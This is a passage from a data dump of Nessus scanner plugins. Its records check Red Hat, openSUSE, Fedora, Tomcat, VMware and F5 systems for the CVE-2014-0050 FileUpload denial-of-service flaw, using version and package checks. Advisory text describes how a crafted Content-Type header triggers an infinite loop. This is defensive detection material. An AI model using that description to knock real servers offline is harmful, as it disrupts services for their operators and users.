\n value:\n\"Updated Red Hat JBoss Enterprise Application Platform 6.2.1 packages\nthat fix one security issue are now available for Red Hat Enterprise\nLinux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons\nFileUpload, which is embedded in the JBoss Web component of JBoss EAP,\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat\nJBoss Enterprise Application Platform installation and deployed\napplications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on\nRed Hat Enterprise Linux 5 and 6 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2014-0253.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-0050.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jbossweb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0253\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossweb-\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossweb-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jbossweb\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:43:08", "references": ["http://www.nessus.org/u?358ef049", "http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.3"], "pluginID": "72693", "description": "According to its self-reported version number, the instance of Apache Tomcat 8.0.x listening on the remote host is a version prior to 8.0.3.\nIt is, therefore, affected by a denial of service vulnerability due to an error related to handling 'Content-Type' HTTP headers and multipart requests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache Commons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 7, "reporter": "Tenable", "published": "2014-02-25T00:00:00", "title": "Apache Tomcat 8.0.x < 8.0.3 Content-Type DoS", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-08-03T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_0_3.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72693", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72693);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/08/03 11:35:08\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"Apache Tomcat 8.0.x < 8.0.3 Content-Type DoS\");\n script_summary(english:\"Checks the Apache Tomcat version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Apache\nTomcat 8.0.x listening on the remote host is a version prior to 8.0.3.\nIt is, therefore, affected by a denial of service vulnerability due to\nan error related to handling 'Content-Type' HTTP headers and multipart\nrequests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.3\");\n # http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?358ef049\");\n script_set_attribute(attribute:\"solution\", value:\"Update to Apache Tomcat version 8.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"tomcat_error_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"installed_sw/Apache Tomcat\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\n# Note that 8.0.2 contained the fix,\n# but was never released.\ntomcat_check_version(fixed:\"8.0.2\", min:\"8.0.0\", severity:SECURITY_WARNING, granularity_regex:\"^8(\\.0)?$\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:50:14", "references": ["http://lists.opensuse.org/opensuse-updates/2014-04/msg00040.html", "https://bugzilla.novell.com/show_bug.cgi?id=862781"], "pluginID": "75325", "description": "This jakarta-commons-fileupload update fixes the follwoing security issue :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS (CVE-2014-0050).", "edition": 4, "reporter": "Tenable", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0527-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2015-11-06T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:jakarta-commons-fileupload", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-298.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75325", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-298.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75325);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/11/06 14:51:23 $\");\n\n script_cve_id(\"CVE-2014-0050\");\n\n script_name(english:\"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0527-1)\");\n script_summary(english:\"Check for the openSUSE-2014-298 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This jakarta-commons-fileupload update fixes the follwoing security\nissue :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS\n (CVE-2014-0050).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-04/msg00040.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-fileupload packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"jakarta-commons-fileupload-1.1.1-117.121.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"jakarta-commons-fileupload-javadoc-1.1.1-117.121.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:32:48", "references": ["https://www.vmware.com/security/advisories/VMSA-2014-0007"], "pluginID": "78671", "description": "The version of VMware vCenter Orchestrator installed on the remote host is 5.5.x prior to 5.5.2. It is, therefore, affected by a denial of service vulnerability due to an error that exists in the included Apache Tomcat version related to handling 'Content-Type' HTTP headers and multipart requests.", "edition": 5, "reporter": "Tenable", "published": "2014-10-24T00:00:00", "title": "VMware vCenter Orchestrator 5.5.x < 5.5.2 DoS (VMSA-2014-0007)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Misc.", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator"], "id": "VMWARE_ORCHESTRATOR_VMSA_2014_0007.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78671", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78671);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/08/06 14:03:15\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"VMSA\", value:\"2014-0007\");\n\n script_name(english:\"VMware vCenter Orchestrator 5.5.x < 5.5.2 DoS (VMSA-2014-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter Orchestrator.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Orchestrator installed on the remote\nhost is 5.5.x prior to 5.5.2. It is, therefore, affected by a denial\nof service vulnerability due to an error that exists in the included\nApache Tomcat version related to handling 'Content-Type' HTTP headers\nand multipart requests.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0007\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware vCenter Orchestrator 5.5.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/24\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_vcenter_orchestrator_installed.nbin\");\n script_require_keys(\"installed_sw/VMware vCenter Orchestrator\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"VMware vCenter Orchestrator\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\nverui = install['VerUI'];\npath = install['path'];\n\nif (version =~ '^5\\\\.5\\\\.')\n{\n build = install['Build'];\n if (empty_or_null(build)) exit(1, 'The ' + app_name + ' build number is missing.');\n\n if (int(build) < 1951762)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : 5.5.2 Build 1951762' +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n }\n}\naudit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:33:05", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062337", "http://www.nessus.org/u?a6ea25eb"], "pluginID": "72544", "description": "This update fixes a denial of service vulnerability which could be triggered by specially crafted input if the buffer used by the MultipartSteeam was not big enough.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2014-02-18T00:00:00", "title": "Fedora 20 : apache-commons-fileupload-1.3-5.fc20 (2014-2175)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2015-11-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:apache-commons-fileupload", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-2175.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72544", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2175.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72544);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2015/11/06 14:51:23 $\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"FEDORA\", value:\"2014-2175\");\n\n script_name(english:\"Fedora 20 : apache-commons-fileupload-1.3-5.fc20 (2014-2175)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a denial of service vulnerability which could be\ntriggered by specially crafted input if the buffer used by the\nMultipartSteeam was not big enough.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062337\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6ea25eb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-fileupload package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:apache-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"apache-commons-fileupload-1.3-5.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-fileupload\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:10:59", "references": ["https://support.f5.com/csp/#/article/K15189"], "pluginID": "78165", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. (CVE-2014-0050)", "edition": 8, "reporter": "Tenable", "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : Apache Commons FileUpload vulnerability (K15189)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "F5 Networks Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-07-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL15189.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78165", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K15189.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78165);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/10 14:27:32\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n\n script_name(english:\"F5 Networks BIG-IP : Apache Commons FileUpload vulnerability (K15189)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions. (CVE-2014-0050)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/#/article/K15189\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K15189.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K15189\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.5.4\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\");\n\n# 